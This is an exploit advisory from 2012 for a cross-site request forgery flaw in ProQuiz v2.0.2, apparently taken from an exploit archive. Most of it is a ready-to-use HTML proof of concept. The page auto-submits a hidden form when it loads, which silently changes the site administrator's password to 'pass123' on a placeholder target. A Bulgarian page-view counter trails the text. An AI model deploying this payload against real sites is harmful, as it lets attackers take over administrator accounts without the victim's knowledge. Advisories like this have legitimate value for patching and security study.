########################################## [~] Exploit Title: ProQuiz v2.0.2 CSRF Vulnerability [~] Author: DaOne [~] Date: 19/8/2012 [~] Software Link: http://code.google.com/p/proquiz/downloads/list ########################################## [#] [ CSRF Change Admin Password ] </form> <html> <body onload="document.form0.submit();"> <form method="POST" name="form0" action="http://[target]/functions.php?action=edit_profile&type=password"> <input type="hidden" name="password" value="pass123"/> <input type="hidden" name="cpassword" value="pass123"/> </form> </body> </html> ##########################################Брой прочитания на тази страница: 1110
ProQuiz v2.0.2 CSRF Vulnerability